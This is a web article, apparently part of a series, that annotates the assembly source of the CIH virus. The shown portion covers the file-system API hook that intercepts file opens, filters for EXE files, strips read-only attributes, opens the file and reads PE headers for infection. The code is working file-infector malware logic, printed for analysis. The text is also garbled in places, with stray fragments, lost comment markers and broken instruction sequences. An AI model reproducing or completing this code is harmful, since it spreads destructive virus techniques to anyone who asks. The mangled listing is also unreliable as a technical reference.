Analysis of virus program source code examples-CIH virus[3]

jmp ExitRing0Init;Exit Ring0 level
　
　;Merged code size
　CodeSizeOfMergeVirusCodeSection = offset $
　
　call @4
　
　@4:
　pop ebx ;Get the offset address of the current instruction
　add ebx, FileSystemApiHook-@4 ;The difference plus the offset is equal to FileSystemApiHook Offset
　
Push ebx
int 20h; Call Vxd to remove the hook pointing to FileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h; Use eax, ecx, edx and flags registers
pop eax
 eax
push ebx

call OldInstallFileSystemApiHook-@3[ebx]
pop ecx

mov dr0, eax ;Adjust OldFileSystemApiHook address

pop eax
pop ebx
 # Push ad ;Save the register
@5 ;esi is the offset of FileSystemApiHook
;;The difference between the offset of VirusGameDataStartAddress and VirusGameDataStartAddress is equal to the offset of VirusGameDataStartAddress
　
;Test the "busy" flag, and "busy" goes to pIFSFunc
　test byte ptr (OnBusy-@6)[esi], 01h
jnz pIFSFunc

; If the file is not open, go to prevhook
lea ebx, [esp+20h+04h+04h] ;ebx is the address of FunctionNum
　
　;The calling format of the file system hook is as follows
　;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,
　;int ResourceFlags, int CodePage, pioreq pir)
　
　;Determine whether this call is to open a file, if not, jump to the previous file hook
　cmp dword ptr [ebx], 00000024h
　jne prevhook
　
　inc byte ptr (OnBusy -@6)[esi] ; Enable OnBusy ;Set the "Busy" flag to "Busy"
　　
　;Get the drive letter specified by the file path, and then put the drive name into the FileNameBuffer
　;If the drive letter If it is 03h, it means that the drive is C drive
mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6 ;esi points to FileNameBuffer

push esi ;save
mov al, [ebx +04h] ;ebx+4 is the address of the disk number
　
　;Is it a UNC (universal naming conventions) address? If so, transfer to CallUniToBCSPath
　cmp al, 0ffh
　je CallUniToBCSPath
　
Add al, 40h
mov ah, ':'
mov [esi], eax ; processed into the form of "X:", that is, add a colon after the drive letter
　
inc esi
　inc esi
　
　;Convert Canonicalized Unicode characters to ordinary BCS character set, call method
　;UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath,
　;unsigned int maxLength, int charSet)
CallUniToBCSPath:
push 00000000h ;Character set
push FileNameBufferSize ;Character length
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
Add eax, 04h
push eax ; Uni character first address
push esi ; BCS character first address
int 20h ; Call UniToBCSPath
UniToBCSPath = $
dd 00400041h Call id
add esp, 04h*04h
　
　;Determine whether the file is an EXE file
　cmp [esi+eax-04h], 'EXE.'
　pop esi
　jne DisableOnBusy
　
IF DEBUG
　
　;The following information is for debugging
　cmp [esi+eax-06h], 'KCUF'
　jne DisableOnBusy
　
ENDIF
　
　;Judgment file Whether it exists, if not, go to DisableOnBusy
　cmp word ptr [ebx+18h], 01h
　jne DisableOnBusy
　
　;Get the file attributes
　mov ax, 4300h
　int 20h ;The function of calling IFSMgr_Ring0_FileIO to obtain file attributes
IFSMgr_Ring0_FileIO = $
dd 00400032h ;Call number

jc DisableOnBusy
Push ecx
　
;Get IFSMgr_Ring0_FileIO address
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
　
　; Determine whether the file is read-only, if so, modify the file attributes, otherwise go to OpenFile
Test cl, 01h
jz OpenFile

mov ax, 4301h
xor ecx, ecx
call edi ;Call IFSMgr_Ring0_FileIO to modify the file attributes to make the file writable
　
　;Open the file
　OpenFile:
　xor eax, eax
　mov ah, 0d5h
　xor ecx, ecx ;File attributes
xor edx, edx
inc edx
mov ebx, edx
inc ebx ;esi is the first address of the file name
call edi ;Call the function of IFSMgr_Ring0_FileIO to open the file
## test cl, 01h
　 jz IsOpenFileOK
　
　;Restore file attributes
mov ax, 4301h
call edi;Restore file attributes
　
　;Whether the file is opened successfully, if not , then turn to DisableOnBusy
IsOpenFileOK:
popf
jc DisableOnBusy

; The file is opened successfully
push esi; Push the first address of the file name data area onto the stack
pushf ;CF = 0, save flag
　
　add esi, DataBuffer-@7 ;esi points to the first address of the data area
　
　;Get the offset of the new file header
　xor eax, eax
　mov ah, 0d6h;IFSMgr_Ring0_FileIO's file reading function number (R0_READFILE)
　
　;In order to minimize the length of the virus code, save eax to ebp
　mov ebp, eax
　
Push 00000004h ; Read 4 bytes
pop ecx
push 0000003ch ; Read the Windows file header offset at DOS file header offset 3ch
pop edx
call edi ; Read File to esi
　
　mov edx, [esi] ;Windows file header offset to edx
　
　; Get the PE mark and infected mark of the graphic file header
　dec edx
 mov eax, ebp ; function number
 call edi ; read file to esi

; Determine whether it is PE, if so, further determine whether it has been infected , if so, it will not be infected with Self-Extractor *
　cmp dword ptr [esi], 00455000h; Determine whether it is a PE file (mark "PE/0/0")
　jne CloseFile; If not, close the file
​ ;Mark size
push edx ;edx points to PE file header offset 00h
push edi ;edi is the address of IFSMgr_Ring0_FileIO
　
　mov dr1, esp ;Save esp
　
　Entry
push eax
　
　　Read file header
　mov eax, ebp  
　mov cl, SizeOfImageHeaderToRead      To read 2 bytes  
　add edx, 07h                                                For NumberOfSections (number of blocks)
　call edi ;Read NumberOfSections (number of blocks) to esi
　　
　lea eax, (AddressOfEntryPoint-@8)[edx]
　　push eax ;File pointer
　
　lea eax, (NewAddressOfEntryPoint-@8)[esi]
　push eax; Buffer address
　
　;Put the value of edx to the beginning of the file virus code block table
　movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
　lea edx, [eax+edx+12h] ;edx is the offset of the virus code block table
　
　;Get the virus code block table The size of
mov al, SizeOfScetionTable ;The size of each block table entry
The number of blocks is equal to the size of the block table
　　
　; Set the virus code block table
　lea esi, (StartOfSectionTable-@8)[esi]; esi points to the first address of the block table (in the virus dynamic data area)

The above is the content of virus program source code example analysis-CIH virus [3]. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!